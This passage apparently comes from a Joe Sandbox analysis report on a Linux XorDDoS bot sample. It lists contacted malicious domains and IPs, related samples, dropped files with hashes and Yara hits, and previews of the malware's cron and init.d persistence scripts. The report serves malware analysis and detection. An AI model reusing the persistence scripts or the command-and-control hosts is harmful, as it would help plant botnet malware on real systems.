ww.gzcfr5axf6.com	23.235.171.197	true	false	unknown
ww.dnstells.com	unknown	unknown	true	unknown
ww.gzcfr5axf7.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
ww.dnstells.com:25	true	Avira URL Cloud: malware	unknown
http://aaa.dsaj2a.org/config.rar	true	Avira URL Cloud: safe	unknown
http://aaa.dsaj2a.org/config.rar7.com:25	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.gnu.org/software/libc/bugs.html	HaJTqGiPpD, posifzmmhg.17.dr, sxruomujjd.17.dr, sotpizdssr.17.dr, kigdktzeum.17.dr, ibkljkndlm.17.dr, libudev.so.17.dr, wvbxepjyjx.17.dr, eqznayducj.17.dr, qrabekbstr.17.dr, mizdkrdyqj.17.dr, iulapzbfpq.17.dr, gnmftoxpza.17.dr, becqudbgme.17.dr, buxftyvhwp.17.dr	false	Avira URL Cloud: safe	unknown
http://aaa.dsaj2a.org/config.rar7.com:25	HaJTqGiPpD, 6229.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6231.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6232.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6233.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6263.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6266.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6269.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6272.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6274.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6280.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6283.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6285.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6288.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6291.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6298.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6300.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6303.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6306.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6310.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6328.1.00000000ffecc000.00000000ffeed000.rw-.sdmp, HaJTqGiPpD, 6331.1.00000000ffecc000.00000000ffeed000.rw-.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
23.253.46.64	aaa.dsaj2a.org	United States	19994	RACKSPACEUS	true
23.235.171.197	ww.gzcfr5axf6.com	United States	26484	IKGUL-26484US	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
23.253.46.64	Bn0VHqJWSS.exe	Get hash	malicious	Unknown	Browse	doubleenough.net/index.php
	gZVfHNoTGQ.exe	Get hash	malicious	Unknown	Browse	doubleenough.net/index.php
	Bn0VHqJWSS.exe	Get hash	malicious	Unknown	Browse	doubleenough.net/index.php
	gZVfHNoTGQ.exe	Get hash	malicious	Unknown	Browse	doubleenough.net/index.php
	spug64.exe	Get hash	malicious	Simda Stealer	Browse	gahyqah.com/login.php
	0HVVcaZuD1.exe	Get hash	malicious	Simda Stealer	Browse	gahyqah.com/login.php
	JevgQ6OvYY.exe	Get hash	malicious	Simda Stealer	Browse	gahyqah.com/login.php
	task2.bin	Get hash	malicious	XorDDoS	Browse	aaa.dsaj2a.org/config.rar
	task2.bin	Get hash	malicious	XorDDoS	Browse	aaa.dsaj2a.org/config.rar
	task2.bin	Get hash	malicious	XorDDoS	Browse	aaa.dsaj2a.org/config.rar
23.235.171.197	http://43.249.172.195:888/112s	Get hash	malicious	Unknown	Browse
	http://43.249.172.195:888/112s	Get hash	malicious	Unknown	Browse
	112	Get hash	malicious	XorDDoS	Browse
	RDf54Bs5B8	Get hash	malicious	XorDDoS	Browse
	A5VDNgeGpn	Get hash	malicious	XorDDoS	Browse
91.189.91.43	SecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	157-15124.elf	Get hash	malicious	Unknown	Browse
	92.249.48.62-mips-2024-08-19T13_42_59.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elf	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elf	Get hash	malicious	Mirai	Browse
	SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elf	Get hash	malicious	Mirai	Browse
	SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elf	Get hash	malicious	Mirai	Browse
	93.123.85.86-sparc-2024-08-18T08_22_12.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	tarm7.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
aaa.dsaj2a.org	task2.bin	Get hash	malicious	XorDDoS	Browse	23.253.46.64
	task2.bin	Get hash	malicious	XorDDoS	Browse	23.253.46.64
	task2.bin	Get hash	malicious	XorDDoS	Browse	23.253.46.64
	4ljhdTTyiA	Get hash	malicious	XorDDoS	Browse	23.253.46.64
ww.gzcfr5axf6.com	23.vir	Get hash	malicious	XorDDoS	Browse	172.81.99.10
	23.vir	Get hash	malicious	XorDDoS	Browse	43.229.113.27
	CCCxor.o	Get hash	malicious	XorDDoS	Browse	23.248.237.29
	task2.bin	Get hash	malicious	XorDDoS	Browse	23.248.237.29
	task2.bin	Get hash	malicious	XorDDoS	Browse	23.248.237.29
	task2.bin	Get hash	malicious	XorDDoS	Browse	23.248.237.29
	23	Get hash	malicious	XorDDoS	Browse	103.213.247.92
	23	Get hash	malicious	XorDDoS	Browse	23.228.113.246
	EgrT0zBhDa	Get hash	malicious	XorDDoS	Browse	23.228.113.246
	4ljhdTTyiA	Get hash	malicious	XorDDoS	Browse	104.161.25.33

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	SecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm7.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	157-15124.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	92.249.48.62-mips-2024-08-19T13_42_59.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	SecuriteInfo.com.ELF.Mirai-BJH.25754.5582.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.31639.13798.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
CANONICAL-ASGB	SecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm7.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	157-15124.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	92.249.48.62-mips-2024-08-19T13_42_59.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	SecuriteInfo.com.ELF.Mirai-BJH.25754.5582.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elf	Get hash	malicious	Mirai	Browse	91.189.91.42
	SecuriteInfo.com.Linux.Mirai.1424.31639.13798.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
RACKSPACEUS	https://ladentiste.in/portalserverloading/npf1dwpar6jvqtbgya/eXVsaXlhLmtyaWt1bm92YUB0YWJvcmRhc29sdXRpb25zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	50.57.31.206
	https://aeromexico.playable.video/xid_v:6533431697866752.uid_220877362/click/https://foxloc.com.br/g63a/Gcgaming/423184/#?email=YmthbXBodWlzQGdjZ2FtaW5nLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	50.57.31.206
	https://succes.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/password	Get hash	malicious	HTMLPhisher	Browse	50.57.31.206
	https://p2p.travelers.com/human.aspx?OrgID=3217&language=en&Username=melvinat%40davislaw.com&Arg06=178870601&Arg12=message	Get hash	malicious	Unknown	Browse	50.56.19.115
	Updated Handbook.docx	Get hash	malicious	Unknown	Browse	50.57.31.206
	CourtOrder.docx	Get hash	malicious	HTMLPhisher	Browse	50.57.31.206
	PIay__Now__Hi Goodmorning!#7202221511.htm	Get hash	malicious	HTMLPhisher	Browse	50.57.31.206
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	146.20.121.242
	45.66.231.148-mipsel-2024-07-30T12_25_27.elf	Get hash	malicious	Unknown	Browse	198.61.249.63
	http://cdn.amxprd.com/en-us/business/checking/get-started/using-your-business-debit-card	Get hash	malicious	Unknown	Browse	50.57.7.78
INIT7CH	SecuriteInfo.com.ELF.Mirai-CQU.1502.23988.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm7.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	157-15124.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	92.249.48.62-mips-2024-08-19T13_42_59.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SecuriteInfo.com.Linux.Mirai.1424.31057.16040.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	SecuriteInfo.com.Linux.Mirai.1424.32527.3979.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	SecuriteInfo.com.Linux.Mirai.1953.29028.28107.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	SecuriteInfo.com.Linux.Mirai.1424.8086.32504.elf	Get hash	malicious	Mirai	Browse	109.202.202.202
	93.123.85.86-sparc-2024-08-18T08_22_12.elf	Get hash	malicious	Gafgyt, Mirai	Browse	109.202.202.202
	tarm7.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
IKGUL-26484US	nullnet_load.arm.elf	Get hash	malicious	Mirai	Browse	156.249.231.105
	nullnet_load.arm7.elf	Get hash	malicious	Mirai	Browse	156.249.231.183
	b3astmode.arm.elf	Get hash	malicious	Mirai	Browse	156.249.34.142
	teste.arm.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	192.126.124.174
	arm5-20240807-1021.elf	Get hash	malicious	Mirai	Browse	156.231.181.90
	154.216.17.9-skid.m68k-2024-08-04T06_23_08.elf	Get hash	malicious	Mirai, Moobot	Browse	156.249.34.123
	154.216.17.9-skid.mips-2024-08-04T06_23_09.elf	Get hash	malicious	Mirai, Moobot	Browse	156.249.34.105
	154.216.17.9-skid.x86-2024-08-04T06_23_12.elf	Get hash	malicious	Mirai, Moobot	Browse	156.238.135.149
	77.90.35.9-skid.arm5-2024-07-30T07_10_52.elf	Get hash	malicious	Mirai, Moobot	Browse	156.249.231.162
	77.90.35.9-skid.sh4-2024-07-30T07_10_53.elf	Get hash	malicious	Mirai, Moobot	Browse	156.231.211.151

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/cron.hourly/gcc.sh	eTASxT3bjO.elf	Get hash	malicious	XorDDoS	Browse
	TmoTjBkSXT.elf	Get hash	malicious	XorDDoS	Browse
	dptxrnhxmx.elf	Get hash	malicious	XorDDoS	Browse
	1.elf	Get hash	malicious	XorDDoS	Browse
	iJl2Sb6qRa	Get hash	malicious	XorDDoS	Browse
	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse
	fuck.elf	Get hash	malicious	XorDDoS	Browse
	dkuidbsedp	Get hash	malicious	XorDDoS	Browse
	libudev.so	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: eTASxT3bjO.elf, Detection: malicious, Browse Filename: TmoTjBkSXT.elf, Detection: malicious, Browse Filename: dptxrnhxmx.elf, Detection: malicious, Browse Filename: 1.elf, Detection: malicious, Browse Filename: iJl2Sb6qRa, Detection: malicious, Browse Filename: Di1p3oLnDb.elf, Detection: malicious, Browse Filename: fuck.elf, Detection: malicious, Browse Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Download File

Process:	/bin/sh
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/HaJTqGiPpD

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.271199911345881
Encrypted:	false
SSDEEP:	6:hUtoFdU9Y6YsKheJWiBE21YJvmNeMwhi21DzRIY76Mz/L4:6tvBEMO1XzuGzE
MD5:	A4249CBDD3E77F754C770D0D4BADFCD7
SHA1:	AF13C124BBAE07E9FEC4D6B6C15C93754294669C
SHA-256:	B04C8A680391C1D99E17AB4023770030DA491523344B29CB584FBCDB9E0179FC
SHA-512:	4B22C0066D30694E0933D988768EF47FEB348C8859275AA15D2C6239D89F2E717B4B9EA36FAA33C42053C34FE0F0FA6B01921D2A8330E9446AA18156CA35895B
Malicious:	true
Reputation:	low
Preview:	#!/bin/sh.# chkconfig: 12345 90 90.# description: HaJTqGiPpD.### BEGIN INIT INFO.# Provides:..HaJTqGiPpD.# Required-Start:..# Required-Stop:..# Default-Start:.1 2 3 4 5.# Default-Stop:...# Short-Description:.HaJTqGiPpD.### END INIT INFO.case $1 in.start)../tmp/HaJTqGiPpD..;;.stop)..;;.*)../tmp/HaJTqGiPpD..;;.esac.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/run/gcc.pid

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.9681390622295662
Encrypted:	false
SSDEEP:	3:1IcWNfq6Qn:uun
MD5:	BD302FBB2B2236B9E6C684C5A4DBC617
SHA1:	5EA76686CAD0213B547D838BFC6F0A82C503C791
SHA-256:	8AD39FBDC67DC28FA0BF06556FCF78E6886CB9E230288DA835D878192651995C
SHA-512:	E4CA7C999D1EF1D6154F3B6536CC300833225FE21EA04B0BFC09F46D2ABFA3985E486A8FDB164D18601FA46E405F7F47E2F1F59FB057BF1E474FBF2597F8C070
Malicious:	false
Reputation:	low
Preview:	mmsjyydscymtdecauqkhzjvkjzvvgigu

/usr/bin/becqudbgme

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244379813145034
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Am:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91n
MD5:	CB780D7AE3EF97F4221A67B15940A84D
SHA1:	75AA739FAD68A3B1819D624655D4BC13651643DD
SHA-256:	ED44EE9B5E60D181E5C9F73FFCA99DF938824D62DC0226B66EE380F04826FCC7
SHA-512:	CEFE593BCA33720E631321B63CB79834CEFE346D0BB6A1AD9CBC7BC5BA2DD51406841B5E3CFCAA36032650EDB5624B6F5DF24CB1B6DF0008C3F035C535668280
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/becqudbgme, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/becqudbgme, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/becqudbgme, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/becqudbgme, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/buxftyvhwp

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244378524335209
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AK:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91D
MD5:	7B2961599910E9C0848D93F2A9E7562F
SHA1:	920212D1452C83B95D28110EBE018AA975DE02E2
SHA-256:	B9CB72C58BB3730ECE52FE19E0ADDF816D517E660070181DC846C49BC9EC9F22
SHA-512:	1CB776D2A066EB5C7BBD4EEBE012CADF461B8CC6FF20B9E4C02F062F31CEF5C395531335B8957DBBB52A8B8490868803D744D6536DD2B7314FA3C1B00E98F847
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/buxftyvhwp, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/buxftyvhwp, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/buxftyvhwp, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/buxftyvhwp, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/eqznayducj

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244379123757987
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1AO:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91P
MD5:	9A54FA11D5B90703482052DCD884C96B
SHA1:	8DE199826F3D454E92EAE1CACA7B510D6E952C1B
SHA-256:	B014609C389BADA9943B49FD84477889E1318A1694136D7CE7495998D684D34E
SHA-512:	16334C8E7721EDC7B8A050B923ED72C3D592B36693B48C707A877699878C3091E76D9E04E1CFF833CEF192ADCB0C8DC0ABCD355F349AE32ACE16B6ED1017258D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/eqznayducj, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/eqznayducj, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/eqznayducj, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/eqznayducj, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/gnmftoxpza

Download File

Process:	/tmp/HaJTqGiPpD
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244370622992582
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrrrT6yF8EEP4UlUuTh1Av:FBXmkN/+Fhu/Qo4h9L+zNNrBVEBl/91W
MD5:	E0C968701DDBBEBDD70EB5C8F3ABEEB5
SHA1:	371D3AE601A6EF99C91E0385628E44E3845E7D05
SHA-256:	F328A7047D8AFDBE62FF246D6945DE54DAA94F779E88DA21DB33978B2181481B
SHA-512:	88F34D49E853356B63E2D192BEB62D509CBAFE20E210D835B8F082923DDA7F3967496BC0F4ACA01217FB0C0CE49A6C08FD7B9F743B4B0DA09A76B0AC6E7F43C6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/gnmftoxpza, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown Rule: Linux_Trojan_Xorddos_0eb147ca, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown Rule: Linux_Trojan_Xorddos_ba961ed2, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown Rule: Linux_Trojan_Xorddos_2084099a, Description: unknown, Source: /usr/bin/gnmftoxpza, Author: unknown Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/gnmftoxpza, Author: Akamai CSIRT Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/gnmftoxpza, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
